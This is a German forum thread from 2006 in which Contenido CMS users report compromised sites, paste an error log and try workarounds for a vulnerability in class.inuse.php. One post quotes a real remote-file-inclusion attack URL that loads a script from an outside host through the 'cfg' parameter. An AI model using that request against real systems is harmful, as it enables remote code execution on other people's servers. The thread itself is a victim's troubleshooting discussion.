4.4.4 gehackt trotz Fix von 4.4.6

Gesperrt
kypta
Beiträge: 295
Registriert: Di 8. Jul 2003, 13:25
Kontaktdaten:
Kontaktdaten von kypta

4.4.4 gehackt trotz Fix von 4.4.6

Beitrag von kypta » Mo 30. Okt 2006, 11:33

Eigentlich wähnte ich mich da auf der sicheren Seite. Ich habe bei einer 4.4.4 ganz eifach das gemacht, was beim 4.4.6 download steht: Es reicht zum Schließen der Sicherheitslücke vollkommen aus, die class.inuse.php zu ersetzen.

Heute hat mir mein Provider folgendes mitgeteilt:
Am 23.10.2006 kam ein Hackversuch via juniorcom.ch rein. Dabei wurde wohl eine Sicherheitsluecke in Ihrem CMS ausgenutzt, um Daten hochzuladen und auszufuehren: siehe Files in: http://meine.domain/cms/cache/
Well, im cache-Verzeichnis liegt jetzt eine Datei namens acz.tgz (614 KB). Der Inhalt ist laut Virenscanner der Virus Linux/Procfake.

Im Errorlog finde ich für den 23.10 keinen Eintrag. Jedoch am 14.10:
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] lock() failed.
[14-Oct-2006 14:29:42] cannot lock jc_sequence - has it been created?
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
Der Eintrag ist noch wesentlich länger - er widerholt sich aber ständig.

Ideen?
Nach oben
emergence
Beiträge: 10641
Registriert: Mo 28. Jul 2003, 12:49
Wohnort: Austria
Kontaktdaten:
Kontaktdaten von emergence

Re: 4.4.4 gehackt trotz Fix von 4.4.6

Beitrag von emergence » Mo 30. Okt 2006, 14:07

die fehlermeldung aus dem errorlog.txt haben nichts damit zu tun...
Thomas hat geschrieben:Heute hat mir mein Provider folgendes mitgeteilt:
Am 23.10.2006 kam ein Hackversuch via juniorcom.ch rein. Dabei wurde wohl eine Sicherheitsluecke in Ihrem CMS ausgenutzt, um Daten hochzuladen und auszufuehren: siehe Files in: http://meine.domain/cms/cache/
ähm intressant wäre der einstiegspunkt..

sicherheitslücke die class.inuse.php zu ersetzen reicht nicht
-> http://www.contenido.org/forum/viewtopi ... 6719#66719
*** make your own tools (wishlist :: thx)
Nach oben
hgk
Beiträge: 4
Registriert: Mi 20. Apr 2005, 15:59
Kontaktdaten:
Kontaktdaten von hgk

Gibt es eine Möglichkeit die Lücke zu schliessen ?

Beitrag von hgk » Di 5. Dez 2006, 16:55

Ich hab in der class.inuse.php den folgenden Code gesetzt :

if ( $_REQUEST['cfg'] ) { exit; } // workaround remote hacking exploit

if ($_GET["cfg"] || $_POST["cfg"])
{
die();
}



aber es passierte laut Provider wieder:

/contenido/classes/class.inuse.php?cfg[path][contenido]=http://overburnhosting.com/sport/tusuk.htm

Über das Skript wurde ein externes Skript aufgerufen, so konnten Befehle auf
Ihrem Speicherplatz ausgeführt werden.

Bitte um Hilfe
Nach oben
Gesperrt

Zurück zu „Version 4.4“